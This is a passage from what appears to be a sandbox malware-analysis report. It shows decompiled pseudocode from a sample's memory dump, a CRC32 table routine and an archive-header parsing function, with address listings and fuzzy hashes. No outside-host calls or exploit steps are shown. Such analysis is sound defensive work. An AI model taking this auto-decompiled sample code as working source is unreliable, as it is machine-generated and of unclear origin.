~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t82 = _t82 + 1;
				} while (_t82 < 0x100);
				_t43 = 0x43ea64;
				_t83 = 0x1c0;
				do {
					_t3 = _t43 - 4; // 0x0
					_t43 = _t43 + 0x10;
					 *(_t43 + 0x3ec) =  *_t3 >> 0x00000008 ^  *(0x43ea60 + ( *_t3 & 0x000000ff) * 4);
					_t7 = _t43 - 0x10; // 0x0
					 *(_t43 + 0x3f0) =  *_t7 >> 0x00000008 ^  *(0x43ea60 + ( *_t7 & 0x000000ff) * 4);
					_t11 = _t43 - 0xc; // 0x0
					 *(_t43 + 0x3f4) =  *_t11 >> 0x00000008 ^  *(0x43ea60 + ( *_t11 & 0x000000ff) * 4);
					_t15 = _t43 - 8; // 0x0
					_t83 = _t83 - 1;
					 *(_t43 + 0x3f8) =  *_t15 >> 0x00000008 ^  *(0x43ea60 + ( *_t15 & 0x000000ff) * 4);
				} while (_t83 != 0);
				 *0x43ea40 = 0x4224e0;
				 *0x440a60 = 0x4224e0;
				return 0x4224e0;
			}






                                                                                                    0x0041e1d0
                                                                                                    0x0041e1d2
                                                                                                    0x0041e258
                                                                                                    0x0041e25f
                                                                                                    0x0041e260
                                                                                                    0x0041e26c
                                                                                                    0x0041e271
                                                                                                    0x0041e277
                                                                                                    0x0041e277
                                                                                                    0x0041e28c
                                                                                                    0x0041e28f
                                                                                                    0x0041e295
                                                                                                    0x0041e2aa
                                                                                                    0x0041e2b0
                                                                                                    0x0041e2c5
                                                                                                    0x0041e2cb
                                                                                                    0x0041e2e0
                                                                                                    0x0041e2e1
                                                                                                    0x0041e2e1
                                                                                                    0x0041e2ee
                                                                                                    0x0041e2f3
                                                                                                    0x0041e2f9

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: dC$$B$$B
                                                                                                    • API String ID: 0-2071240565
                                                                                                    • Opcode ID: 5c67a73c09bf5973c079bd177e603e0b8a71b8627d43ffc0a87aee53f46ae23c
                                                                                                    • Instruction ID: 0457605db7cd48c44446dbd519bc1de7b478c7d1ccce32d8dc052cb5409b631b
                                                                                                    • Opcode Fuzzy Hash: 5c67a73c09bf5973c079bd177e603e0b8a71b8627d43ffc0a87aee53f46ae23c
                                                                                                    • Instruction Fuzzy Hash: F621933BAA09164BE70C8A28EC73BB92281E745305F89567ED94BCB7D0DF6C8940C648
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FC7CC Relevance: 3.5, APIs: 2, Instructions: 509COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 91%
                                                                                                    			E003FC7CC(void* __ecx, signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				intOrPtr __esi;
				signed int _t341;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t363;
				void* _t367;
				void* _t376;
				intOrPtr _t380;
				signed int _t384;
				signed int _t409;
				signed int _t417;
				signed int _t425;
				intOrPtr* _t427;
				void* _t428;
				signed int _t431;
				void* _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				intOrPtr _t444;
				intOrPtr _t447;
				intOrPtr _t449;
				signed char _t452;
				signed int _t453;
				signed int* _t459;
				signed int _t464;
				intOrPtr _t492;
				signed int _t502;
				signed int _t503;
				char _t504;
				signed int _t515;
				void* _t518;
				intOrPtr _t520;
				void* _t521;
				void* _t523;
				void* _t524;

				_t502 = __edx;
				E0041F1B0(0x427995, _t521);
				_t524 = _t523 - 0x90;
				_t518 = __ecx;
				_t341 = E003FAEC3( *((intOrPtr*)(__ecx + 0x38)));
				_t515 =  *(_t521 + 8);
				 *(_t521 - 0x14) = _t341;
				 *(_t521 - 0x10) = _t502;
				if(_t341 != 2) {
					_t425 = 0;
					__eflags = 0;
				} else {
					_t425 = 0;
					_t529 = _t502;
					if(_t502 == 0) {
						E003FB332(__ecx, _t502, _t529, _t515 + 0xf8);
						 *(_t521 - 0x14) = E003FAEC3( *((intOrPtr*)(_t518 + 0x38)));
						 *(_t521 - 0x10) = _t502;
					}
				}
				 *(_t521 - 0x24) = _t425;
				 *(_t521 - 0x20) = _t425;
				 *(_t521 - 0x1c) = _t425;
				 *(_t521 - 4) = _t425;
				if( *(_t521 - 0x14) != 3) {
					L9:
					 *(_t521 - 0x6c) = _t425;
					 *(_t521 - 0x68) = _t425;
					 *(_t521 - 0x64) = _t425;
					 *(_t521 - 0x9c) = _t425;
					 *(_t521 - 0x98) = _t425;
					 *(_t521 - 0x94) = _t425;
					 *(_t521 - 4) = 2;
					E003FD423(_t521 - 0x90);
					__eflags =  *(_t521 - 0x14) - 4;
					 *(_t521 - 4) = 3;
					if( *(_t521 - 0x14) == 4) {
						__eflags =  *(_t521 - 0x10) - _t425;
						if(__eflags == 0) {
							_t433 = _t515 + 0x110;
							E003FC27D(_t433, _t518, _t502, _t515, _t518, __eflags, _t521 - 0x24, _t433, _t515, _t521 - 0x6c, _t521 - 0x9c);
							 *_t433 =  *_t433 +  *((intOrPtr*)(_t515 + 0x108));
							asm("adc [ebx+0x4], ecx");
							 *(_t521 - 0x14) = E003FAEC3( *((intOrPtr*)(_t518 + 0x38)));
							 *(_t521 - 0x10) = _t502;
							_t425 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t521 - 0x14) - 5;
					if(__eflags != 0) {
						L92:
						E003FCE7D(_t515, __eflags);
						_t345 =  *(_t521 - 0x14) |  *(_t521 - 0x10);
						__eflags =  *(_t521 - 0x14) |  *(_t521 - 0x10);
						if(( *(_t521 - 0x14) |  *(_t521 - 0x10)) != 0) {
							L94:
							 *((char*)(_t515 + 0x14d)) = 1;
							L95:
							E003B1E40(E003B1E40(E003B1E40(_t345,  *((intOrPtr*)(_t521 - 0x90))),  *(_t521 - 0x9c)),  *(_t521 - 0x6c));
							 *(_t521 - 4) =  *(_t521 - 4) | 0xffffffff;
							E003D0A72(_t425, _t521 - 0x24);
							_t350 = 0;
							__eflags = 0;
							goto L96;
						}
						_t520 =  *((intOrPtr*)(_t518 + 0x38));
						_t345 =  *((intOrPtr*)(_t520 + 4)) ==  *((intOrPtr*)(_t520 + 8));
						__eflags =  *((intOrPtr*)(_t520 + 4)) ==  *((intOrPtr*)(_t520 + 8));
						if( *((intOrPtr*)(_t520 + 4)) ==  *((intOrPtr*)(_t520 + 8))) {
							goto L95;
						}
						goto L94;
					} else {
						__eflags =  *(_t521 - 0x10) - _t425;
						if(__eflags != 0) {
							goto L92;
						}
						_t352 = E003FAFBA( *((intOrPtr*)(_t518 + 0x38)), _t502, __eflags);
						_t427 = _t515 + 0x120;
						 *(_t521 + 8) = _t352;
						L00403F6D(_t427);
						_t354 =  *(_t427 + 4);
						 *(_t427 + 4) = _t354 + 1;
						_t444 =  *_t427;
						 *((intOrPtr*)(_t444 + _t354 * 8)) = 9;
						 *(_t444 + 4 + _t354 * 8) =  *(_t444 + 4 + _t354 * 8) & 0x00000000;
						L00403F6D(_t427);
						_t356 =  *(_t427 + 4);
						 *(_t427 + 4) = _t356 + 1;
						_t447 =  *_t427;
						 *((intOrPtr*)(_t447 + _t356 * 8)) = 6;
						 *(_t447 + 4 + _t356 * 8) =  *(_t447 + 4 + _t356 * 8) & 0x00000000;
						__eflags =  *(_t521 + 8);
						if( *(_t521 + 8) <= 0) {
							L17:
							_t357 = 0;
							__eflags = 0;
							L18:
							 *(_t521 - 0x60) = _t357;
							 *(_t521 - 0x5c) = _t357;
							 *(_t521 - 0x58) = _t357;
							 *(_t521 - 0x54) = _t357;
							 *(_t521 - 0x50) = _t357;
							 *(_t521 - 0x4c) = _t357;
							 *(_t521 - 0x48) = _t357;
							 *(_t521 - 0x44) = _t357;
							 *(_t521 - 0x40) = _t357;
							 *(_t521 - 4) = 6;
							 *(_t521 + 0x10) = _t357;
							while(1) {
								_t358 = E003FAEC3( *((intOrPtr*)(_t518 + 0x38)));
								_t449 =  *((intOrPtr*)(_t518 + 0x38));
								 *(_t521 - 0x3c) = _t358;
								__eflags = _t358 | _t502;
								 *(_t521 - 0x38) = _t502;
								if((_t358 | _t502) == 0) {
									break;
								}
								 *((intOrPtr*)(_t521 - 0x34)) = E003FAEC3(_t449);
								 *(_t521 - 0x30) = _t502;
								_t376 =  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 8));
								__eflags = _t502;
								if(__eflags < 0) {
									L24:
									 *(_t521 - 0x80) =  *(_t521 - 0x80) & 0x00000000;
									 *(_t521 - 0x7f) =  *(_t521 - 0x7f) & 0x00000000;
									_push(1);
									 *(_t521 - 4) = 7;
									E003FAD4F(_t521 - 0x84, _t518,  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 8)) +  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)))),  *((intOrPtr*)(_t521 - 0x34)));
									__eflags =  *(_t521 - 0x38);
									if(__eflags > 0) {
										L60:
										 *((char*)(_t515 + 0x14d)) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 4));
										L61:
										_t380 =  *((intOrPtr*)(_t518 + 0x38));
										_t473 =  *((intOrPtr*)(_t380 + 4)) !=  *((intOrPtr*)(_t380 + 8));
										__eflags =  *((intOrPtr*)(_t380 + 4)) !=  *((intOrPtr*)(_t380 + 8));
										if( *((intOrPtr*)(_t380 + 4)) !=  *((intOrPtr*)(_t380 + 8))) {
											E003FADE3(_t473);
										}
										 *(_t521 - 4) = 6;
										E003FAD00(_t521 - 0x84);
										continue;
									}
									if(__eflags < 0) {
										L27:
										_t384 =  *(_t521 - 0x3c) + 0xfffffff2;
										__eflags = _t384 - 0xb;
										if(__eflags > 0) {
											goto L60;
										}
										switch( *((intOrPtr*)(_t384 * 4 +  &M003FCE4D))) {
											case 0:
												__eax = __ebp - 0x60;
												__ecx = __esi;
												__eax = E003FC3F9(__esi, __edx,  *((intOrPtr*)(__ebp + 8)), __ebp - 0x60);
												__ecx = __ebp - 0x60;
												__eax = E003FACE4(__ecx);
												 *(__ebp - 0x50) =  *(__ebp - 0x50) & 0x00000000;
												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
												 *((intOrPtr*)(__ebp + 0x10)) = __eax;
												goto L41;
											case 1:
												__eax = __ebp - 0x54;
												goto L45;
											case 2:
												__eax = __ebp - 0x48;
												L45:
												__ecx = __esi;
												__eax = E003FC3F9(__ecx, __edx,  *((intOrPtr*)(__ebp + 0x10)), __eax);
												goto L41;
											case 3:
												 *(_t521 - 0x78) =  *(_t521 - 0x78) & 0x00000000;
												 *(_t521 - 0x77) =  *(_t521 - 0x77) & 0x00000000;
												 *(_t521 - 4) = 8;
												E003FAD90(_t521 - 0x7c, __eflags, _t518, _t521 - 0x24);
												 *(_t521 - 0x18) =  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 8));
												E003B421F(_t515 + 0xe8,  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t518 + 0x38)) + 8)));
												E003FAE4F( *((intOrPtr*)(_t518 + 0x38)),  *((intOrPtr*)(_t515 + 0xe8)),  *(_t521 - 0x18));
												L00403D14(_t515 + 0xf0,  *(_t521 + 8) + 1);
												__eflags =  *(_t521 + 8);
												 *(_t521 + 0x18) = 0;
												 *(_t521 + 0xc) = 0;
												if( *(_t521 + 8) <= 0) {
													L36:
													 *( *((intOrPtr*)(_t515 + 0xf0)) +  *(_t521 + 0xc) * 4) =  *(_t521 + 0x18) >> 1;
													__eflags =  *(_t521 + 0x18) -  *(_t521 - 0x18);
													if( *(_t521 + 0x18) !=  *(_t521 - 0x18)) {
														 *((char*)(_t518 + 0x3c)) = 1;
													}
													 *(_t521 - 4) = 7;
													_t481 = _t521 - 0x7c;
													goto L40;
												} else {
													goto L30;
												}
												do {
													L30:
													_t510 =  *(_t521 + 0x18);
													_t402 =  *(_t521 - 0x18) - _t510 >> 1;
													__eflags = _t402;
													_t486 =  *((intOrPtr*)(_t515 + 0xe8)) + _t510;
													 *(_t521 + 0x14) = 0;
													if(_t402 == 0) {
														goto L33;
													} else {
														goto L31;
													}
													while(1) {
														L31:
														__eflags =  *_t486;
														if( *_t486 == 0) {
															goto L33;
														}
														 *(_t521 + 0x14) =  *(_t521 + 0x14) + 1;
														_t486 = _t486 + 2;
														__eflags =  *(_t521 + 0x14) - _t402;
														if( *(_t521 + 0x14) < _t402) {
															continue;
														}
														goto L33;
													}
													L33:
													__eflags =  *(_t521 + 0x14) - _t402;
													if( *(_t521 + 0x14) == _t402) {
														E003FADE3(_t486);
													}
													_t487 =  *(_t521 + 0xc);
													 *( *((intOrPtr*)(_t515 + 0xf0)) + _t487 * 4) =  *(_t521 + 0x18) >> 1;
													_t488 = _t487 + 1;
													__eflags = _t488 -  *(_t521 + 8);
													 *(_t521 + 0xc) = _t488;
													 *(_t521 + 0x18) =  *(_t521 + 0x18) + 2 +  *(_t521 + 0x14) * 2;
												} while (_t488 <  *(_t521 + 8));
												goto L36;
											case 4:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0x64;
												goto L50;
											case 5:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0x7c;
												goto L50;
											case 6:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0x94;
												goto L50;
											case 7:
												__eax = __edi + 0xc4;
												__ecx = __esi;
												__eax = E003FC447(__esi, __edx, __eflags,  *((intOrPtr*)(__ebp + 8)), __edi + 0xc4);
												 *(__ebp - 0x70) =  *(__ebp - 0x70) & 0x00000000;
												_t184 = __ebp - 0x6f;
												 *_t184 =  *(__ebp - 0x6f) & 0x00000000;
												__eflags =  *_t184;
												__eax = __ebp - 0x24;
												__ecx = __ebp - 0x74;
												 *((char*)(__ebp - 4)) = 9;
												E003FAD90(__ebp - 0x74, __eflags, __esi, __ebp - 0x24) = __edi + 0xc4;
												__ecx = __esi;
												__eax = L003FB754(__esi, __eflags, __edi + 0xc4);
												 *((char*)(__ebp - 4)) = 7;
												__ecx = __ebp - 0x74;
												L40:
												E003FAD00(_t481);
												goto L41;
											case 8:
												goto L60;
											case 9:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0xac;
												L50:
												_push(__eax);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __esi;
												__eax = E003FC49F(__ecx, __edx, __eflags);
												L41:
												L00403F6D(_t427);
												_t399 =  *(_t427 + 4);
												 *(_t427 + 4) = _t399 + 1;
												_t484 =  *_t427;
												 *(_t484 + _t399 * 8) =  *(_t521 - 0x3c);
												_t502 =  *(_t521 - 0x38);
												 *(_t484 + 4 + _t399 * 8) = _t502;
												goto L61;
											case 0xa:
												__eax = 0;
												__eflags =  *(__ebp - 0x30);
												 *((intOrPtr*)(__ebp - 0x2c)) = 0;
												 *((intOrPtr*)(__ebp - 0x28)) = 0;
												if(__eflags < 0) {
													goto L61;
												}
												if(__eflags > 0) {
													goto L54;
													do {
														do {
															L54:
															__ecx =  *((intOrPtr*)(__esi + 0x38));
															__eax = E003FAE31(__ecx);
															__eflags = __al;
															if(__al != 0) {
																 *((char*)(__esi + 0x3c)) = 1;
															}
															 *((intOrPtr*)(__ebp - 0x2c)) =  *((intOrPtr*)(__ebp - 0x2c)) + 1;
															asm("adc dword [ebp-0x28], 0x0");
															__eax =  *((intOrPtr*)(__ebp - 0x28));
															__eflags =  *((intOrPtr*)(__ebp - 0x28)) -  *(__ebp - 0x30);
														} while (__eflags < 0);
														if(__eflags > 0) {
															goto L61;
														}
														__eax =  *((intOrPtr*)(__ebp - 0x2c));
														__eflags =  *((intOrPtr*)(__ebp - 0x2c)) -  *(__ebp - 0x34);
													} while ( *((intOrPtr*)(__ebp - 0x2c)) <  *(__ebp - 0x34));
													goto L61;
												}
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) <= 0) {
													goto L61;
												}
												goto L54;
										}
									}
									__eflags =  *(_t521 - 0x3c) - 0x40000000;
									if( *(_t521 - 0x3c) > 0x40000000) {
										goto L60;
									}
									goto L27;
								}
								if(__eflags > 0) {
									L23:
									E003FADE3(0);
									goto L24;
								}
								__eflags =  *((intOrPtr*)(_t521 - 0x34)) - _t376;
								if( *((intOrPtr*)(_t521 - 0x34)) <= _t376) {
									goto L24;
								}
								goto L23;
							}
							 *(_t521 - 0x14) = E003FAEC3(_t449);
							 *(_t521 - 0x10) = _t502;
							__eflags =  *(_t521 + 8) -  *(_t521 + 0x10) -  *(_t521 - 0x68);
							if( *(_t521 + 8) -  *(_t521 + 0x10) !=  *(_t521 - 0x68)) {
								_push(0x438128);
								_push(_t521 + 0xb);
								L0041F1D0();
							}
							 *(_t521 + 0x18) =  *(_t521 + 0x18) & 0x00000000;
							 *(_t521 + 0x14) =  *(_t521 + 0x14) & 0x00000000;
							_t363 = E003FACE4(_t521 - 0x48);
							__eflags = _t363;
							 *(_t521 - 0x18) = _t363;
							if(_t363 != 0) {
								_t432 = _t515 + 0xdc;
								E003EF1E5(_t432,  *(_t521 + 8));
								 *(_t432 + 4) =  *(_t521 + 8);
							}
							_t428 = _t515 + 0x58;
							E003FD484(_t428,  *(_t521 + 8));
							_t365 =  *(_t521 + 8);
							 *(_t428 + 4) = _t365;
							_t425 = 0;
							__eflags = _t365;
							 *(_t521 + 0xc) = 0;
							if(__eflags <= 0) {
								L91:
								_t367 = E003B1E40(E003B1E40(_t365,  *(_t521 - 0x48)),  *(_t521 - 0x54));
								 *(_t521 - 4) = 3;
								E003B1E40(_t367,  *(_t521 - 0x60));
								_t524 = _t524 + 0xc;
								goto L92;
							} else {
								_t266 = _t521 + 0x10;
								 *_t266 =  *(_t521 + 0x10) & 0;
								__eflags =  *_t266;
								do {
									_t503 =  *(_t521 + 0x18);
									_t365 =  *((intOrPtr*)(_t515 + 0x58)) +  *(_t521 + 0x10);
									_t365[2] = _t365[2] & 0x00000000;
									__eflags = _t425 -  *(_t521 - 0x5c);
									if(_t425 >=  *(_t521 - 0x5c)) {
										_t452 = 0;
										__eflags = 0;
									} else {
										_t452 =  *((intOrPtr*)(_t425 +  *(_t521 - 0x60)));
									}
									__eflags = _t452;
									if(_t452 != 0) {
										_t365[3] = _t365[3] & 0x00000000;
										__eflags = _t503 -  *(_t521 - 0x50);
										if(_t503 >=  *(_t521 - 0x50)) {
											_t453 = 0;
											__eflags = 0;
										} else {
											_t453 =  *((intOrPtr*)(_t503 +  *(_t521 - 0x54)));
										}
										__eflags = _t453;
										_t365[3] = _t453 & 0xffffff00 | _t453 == 0x00000000;
										__eflags = _t503 -  *(_t521 - 0x44);
										if(_t503 >=  *(_t521 - 0x44)) {
											_t504 = 0;
											__eflags = 0;
										} else {
											_t504 =  *((intOrPtr*)( *(_t521 + 0x18) +  *(_t521 - 0x48)));
										}
										 *_t365 =  *_t365 & 0x00000000;
										 *(_t521 + 0x18) =  *(_t521 + 0x18) + 1;
										_t365[1] = _t365[1] & 0x00000000;
										_t313 =  &(_t365[3]);
										 *_t313 = _t365[3] & 0x00000000;
										__eflags =  *_t313;
									} else {
										_t365[3] = _t365[3] & _t452;
										_t365[3] = 1;
										_t504 = 0;
										_t459 =  *(_t521 - 0x6c) +  *(_t521 + 0x14) * 8;
										 *_t365 =  *_t459;
										_t431 =  *(_t521 + 0x14);
										_t365[1] = _t459[1];
										__eflags = _t431 -  *(_t521 - 0x98);
										if(_t431 >=  *(_t521 - 0x98)) {
											L77:
											__eflags = 0;
											L78:
											__eflags = 0;
											_t365[3] = 0;
											if(0 != 0) {
												_t365[2] =  *( *((intOrPtr*)(_t521 - 0x90)) + _t431 * 4);
											}
											 *(_t521 + 0x14) =  *(_t521 + 0x14) + 1;
											_t425 =  *(_t521 + 0xc);
											goto L88;
										}
										_t464 =  *(_t521 - 0x9c);
										__eflags =  *(_t431 + _t464);
										if( *(_t431 + _t464) == 0) {
											goto L77;
										}
										_push(1);
										_pop(0);
										goto L78;
									}
									L88:
									__eflags =  *(_t521 - 0x18);
									if( *(_t521 - 0x18) != 0) {
										_t365 =  *(_t515 + 0xdc);
										 *((char*)( *(_t515 + 0xdc) + _t425)) = _t504;
									}
									 *(_t521 + 0x10) =  *(_t521 + 0x10) + 0x10;
									_t425 = _t425 + 1;
									__eflags = _t425 -  *(_t521 + 8);
									 *(_t521 + 0xc) = _t425;
								} while (__eflags < 0);
								goto L91;
							}
						}
						_t357 = 0;
						__eflags =  *(_t521 - 0x98);
						if( *(_t521 - 0x98) == 0) {
							goto L18;
						}
						L00403F6D(_t427);
						_t409 =  *(_t427 + 4);
						 *(_t427 + 4) = _t409 + 1;
						_t492 =  *_t427;
						 *((intOrPtr*)(_t492 + _t409 * 8)) = 0xa;
						_t87 = _t492 + 4 + _t409 * 8;
						 *_t87 =  *(_t492 + 4 + _t409 * 8) & 0x00000000;
						__eflags =  *_t87;
						goto L17;
					}
				} else {
					_t531 =  *(_t521 - 0x10) - _t425;
					if( *(_t521 - 0x10) != _t425) {
						goto L9;
					}
					_push( *(_t521 + 0x18));
					_t434 = _t515 + 0x118;
					_push( *(_t521 + 0x14));
					_push( *(_t521 + 0x10));
					_push( *(_t521 + 0xc));
					_push(_t521 - 0x24);
					_push(_t434);
					_push( *((intOrPtr*)(_t515 + 0x10c)));
					_push( *((intOrPtr*)(_t515 + 0x108)));
					_t417 = E003FC537(_t518, _t502, _t531);
					 *(_t521 + 8) = _t417;
					if(_t417 == 0) {
						 *_t434 =  *_t434 +  *((intOrPtr*)(_t515 + 0x108));
						asm("adc [ebx+0x4], ecx");
						 *(_t521 - 0x14) = E003FAEC3( *((intOrPtr*)(_t518 + 0x38)));
						 *(_t521 - 0x10) = _t502;
						_t425 = 0;
						__eflags = 0;
						goto L9;
					}
					 *(_t521 - 4) =  *(_t521 - 4) | 0xffffffff;
					E003D0A72(_t434, _t521 - 0x24);
					_t350 =  *(_t521 + 8);
					L96:
					 *[fs:0x0] =  *((intOrPtr*)(_t521 - 0xc));
					return _t350;
				}
			}












































                                                                                                    0x003fc7cc
                                                                                                    0x003fc7d1
                                                                                                    0x003fc7d6
                                                                                                    0x003fc7de
                                                                                                    0x003fc7e4
                                                                                                    0x003fc7e9
                                                                                                    0x003fc7ef
                                                                                                    0x003fc7f2
                                                                                                    0x003fc7f5
                                                                                                    0x003fc81b
                                                                                                    0x003fc81b
                                                                                                    0x003fc7f7
                                                                                                    0x003fc7f7
                                                                                                    0x003fc7f9
                                                                                                    0x003fc7fb
                                                                                                    0x003fc806
                                                                                                    0x003fc813
                                                                                                    0x003fc816
                                                                                                    0x003fc816
                                                                                                    0x003fc7fb
                                                                                                    0x003fc81d
                                                                                                    0x003fc820
                                                                                                    0x003fc823
                                                                                                    0x003fc82a
                                                                                                    0x003fc82d
                                                                                                    0x003fc89a
                                                                                                    0x003fc89a
                                                                                                    0x003fc89d
                                                                                                    0x003fc8a0
                                                                                                    0x003fc8a3
                                                                                                    0x003fc8a9
                                                                                                    0x003fc8af
                                                                                                    0x003fc8bb
                                                                                                    0x003fc8bf
                                                                                                    0x003fc8c4
                                                                                                    0x003fc8c8
                                                                                                    0x003fc8cc
                                                                                                    0x003fc8ce
                                                                                                    0x003fc8d1
                                                                                                    0x003fc8d9
                                                                                                    0x003fc8ec
                                                                                                    0x003fc8fd
                                                                                                    0x003fc8ff
                                                                                                    0x003fc90a
                                                                                                    0x003fc90d
                                                                                                    0x003fc910
                                                                                                    0x003fc910
                                                                                                    0x003fc910
                                                                                                    0x003fc8d1
                                                                                                    0x003fc912
                                                                                                    0x003fc916
                                                                                                    0x003fcdec
                                                                                                    0x003fcdee
                                                                                                    0x003fcdf6
                                                                                                    0x003fcdf6
                                                                                                    0x003fcdf9
                                                                                                    0x003fce06
                                                                                                    0x003fce06
                                                                                                    0x003fce0d
                                                                                                    0x003fce26
                                                                                                    0x003fce2b
                                                                                                    0x003fce35
                                                                                                    0x003fce3a
                                                                                                    0x003fce3a
                                                                                                    0x00000000
                                                                                                    0x003fce3a
                                                                                                    0x003fcdfb
                                                                                                    0x003fce01
                                                                                                    0x003fce01
                                                                                                    0x003fce04
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc91c
                                                                                                    0x003fc91c
                                                                                                    0x003fc91f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc928
                                                                                                    0x003fc92d
                                                                                                    0x003fc933
                                                                                                    0x003fc938
                                                                                                    0x003fc93d
                                                                                                    0x003fc943
                                                                                                    0x003fc946
                                                                                                    0x003fc948
                                                                                                    0x003fc94f
                                                                                                    0x003fc956
                                                                                                    0x003fc95b
                                                                                                    0x003fc961
                                                                                                    0x003fc964
                                                                                                    0x003fc966
                                                                                                    0x003fc96d
                                                                                                    0x003fc972
                                                                                                    0x003fc976
                                                                                                    0x003fc9a0
                                                                                                    0x003fc9a0
                                                                                                    0x003fc9a0
                                                                                                    0x003fc9a2
                                                                                                    0x003fc9a2
                                                                                                    0x003fc9a5
                                                                                                    0x003fc9a8
                                                                                                    0x003fc9ab
                                                                                                    0x003fc9ae
                                                                                                    0x003fc9b1
                                                                                                    0x003fc9b4
                                                                                                    0x003fc9b7
                                                                                                    0x003fc9ba
                                                                                                    0x003fc9bd
                                                                                                    0x003fc9c1
                                                                                                    0x003fc9c4
                                                                                                    0x003fc9c7
                                                                                                    0x003fc9cc
                                                                                                    0x003fc9cf
                                                                                                    0x003fc9d2
                                                                                                    0x003fc9d4
                                                                                                    0x003fc9d7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003fc9e5
                                                                                                    0x003fc9e8
                                                                                                    0x003fc9ee
                                                                                                    0x003fc9f3
                                                                                                    0x003fc9f5
                                                                                                    0x003fca03
                                                                                                    0x003fca03
                                                                                                    0x003fca07
                                                                                                    0x003fca0e
                                                                                                    0x003fca13
                                                                                                    0x003fca24
                                                                                                    0x003fca29
                                                                                                    0x003fca2d
                                                                                                    0x003fcc50
                                                                                                    0x003fcc50
                                                                                                    0x003fcc5d
